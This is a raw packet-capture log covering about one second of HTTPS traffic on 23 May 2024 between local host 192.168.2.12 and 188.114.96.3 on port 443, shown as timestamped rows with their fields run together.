                May 23, 2024 18:26:39.525913954 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.525962114 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.526633978 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.526650906 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.526695967 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.526700974 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.526736021 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.527374983 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.527393103 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.527437925 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.527442932 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.527477980 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.528619051 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.528637886 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.528688908 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.528695107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.528729916 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.529588938 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.529607058 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.529659986 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.529665947 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.529699087 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.530606985 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.530621052 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.530683041 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.530689955 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.530726910 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.608716965 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.608745098 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.608958960 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.608980894 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.609040022 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.613074064 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.613099098 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.613234043 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.613241911 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.613293886 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.613941908 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.613965988 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.614018917 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.614023924 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.614063025 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.614923000 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.614943981 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.614986897 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.614991903 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.615026951 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.615441084 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.615478992 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.615524054 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.615529060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.615562916 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.616121054 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.616139889 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.616214991 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.616219997 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.616257906 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.617831945 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.617855072 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.617902040 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.617907047 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.617928982 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.617945910 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.618122101 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.618139029 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.618180990 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.618185043 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.618220091 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.697781086 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.697812080 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.697899103 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.697910070 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.697947025 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.702596903 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.702620983 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.702727079 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.702732086 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.702763081 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.706427097 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.706449986 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.706559896 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.706566095 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.706640005 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.706670046 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.706686974 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.706738949 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.706743956 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.706783056 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.706960917 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.706978083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.707030058 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.707034111 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.707067966 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.707278013 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.707294941 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.707360029 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.707364082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.707406044 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.708266020 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.708288908 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.708349943 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.708354950 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.708440065 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.709197044 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.709218979 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.709309101 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.709314108 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.709366083 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.786349058 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.786381006 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.786494017 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.786520958 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.786537886 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.786561012 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.792527914 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.792555094 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.792671919 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.792694092 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.792738914 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.793283939 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.793307066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.793363094 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.793370962 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.793415070 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.793415070 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.794152975 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.794171095 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.794207096 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.794213057 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.794260979 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.794291019 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.794958115 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.794979095 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.795018911 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.795025110 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.795051098 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.795073032 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.796200991 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.796225071 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.796263933 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.796269894 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.796297073 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.796320915 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.797024012 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.797044992 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.797082901 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.797087908 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.797113895 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.797133923 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.797987938 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.798013926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.798048973 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.798053980 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.798082113 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.798104048 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.878678083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.878715038 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.878865957 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.878890991 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.878933907 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.883120060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.883147955 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.883208990 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.883227110 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.883244991 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.883272886 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.884134054 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.884155035 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.884198904 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.884211063 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.884237051 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.884264946 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.884962082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.884979963 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885020971 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.885030985 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885055065 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.885075092 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.885818958 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885838032 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885881901 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.885888100 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885900974 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885917902 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.885921001 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885945082 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.885951042 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.885968924 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.885987997 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.887115955 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.887135983 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.887183905 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.887192965 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.887209892 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.887237072 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.888175964 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.888192892 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.888274908 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.888274908 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.888283968 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.888326883 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.967726946 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.967766047 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.967796087 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.967809916 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.967827082 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.967849970 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.971479893 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.971498966 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.971573114 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.971596956 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.971637011 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.972477913 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.972497940 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.972549915 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.972556114 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.972584009 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.972615957 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.973515034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.973534107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.973563910 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.973568916 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.973623991 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.973716021 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.974406958 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.974426985 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.974490881 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.974497080 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.974515915 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.974533081 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.975095034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.975111008 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.975214958 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.975220919 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.975255013 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.975647926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.975662947 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.975702047 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.975707054 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.975732088 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.975755930 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.976365089 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.976381063 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.976421118 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.976424932 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.976448059 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.976464033 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.056490898 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.056523085 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.056603909 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.056632996 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.056652069 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.056679010 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.060450077 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.060467958 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.060539007 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.060545921 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.060592890 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.061443090 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.061465025 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.061518908 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.061522961 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.061562061 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.062088966 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.062108994 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.062144041 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.062148094 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.062179089 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.062187910 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.062772036 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.062788963 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.062844992 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.062849998 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.062887907 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.062947989 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.062963963 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.063016891 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.063020945 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.063056946 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.063893080 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.063911915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.063965082 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.063970089 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.064007044 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.064553022 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.064573050 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.064625978 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.064630985 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.064670086 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.145436049 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.145466089 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.145603895 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.145621061 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.145663977 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.152692080 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.152714014 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.152781963 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.152789116 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.152821064 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.152837038 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.153467894 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.153487921 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.153527021 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.153531075 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.153562069 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.153588057 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.154611111 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.154627085 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.154676914 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.154680967 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.154722929 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.154805899 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.154819965 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.154856920 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.154860020 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.154896021 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.154917955 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.155561924 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.155581951 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.155642033 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.155647039 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.155690908 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.157407999 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.157423973 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.157464981 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.157469034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.157500029 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.157517910 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.157521009 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.157531023 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.157550097 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.157571077 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.157613993 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.157617092 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.157666922 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.234277964 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.234314919 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.234416962 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.234436035 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.234455109 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.234474897 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.241698027 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.241715908 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.241815090 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.241818905 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.241857052 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.242816925 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.242834091 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.242880106 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.242883921 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.242916107 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.243513107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.243530035 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.243572950 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.243577003 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.243607044 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.244059086 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.244096994 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.244143009 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.244146109 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.244177103 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.244707108 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.244723082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.244766951 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.244771004 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.244800091 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.245187044 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.245202065 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.245255947 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.245260000 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.245290995 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.245945930 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.245959997 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:40.246011972 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:40.246016026 CEST44349720188.114.96.3192.168.2.12
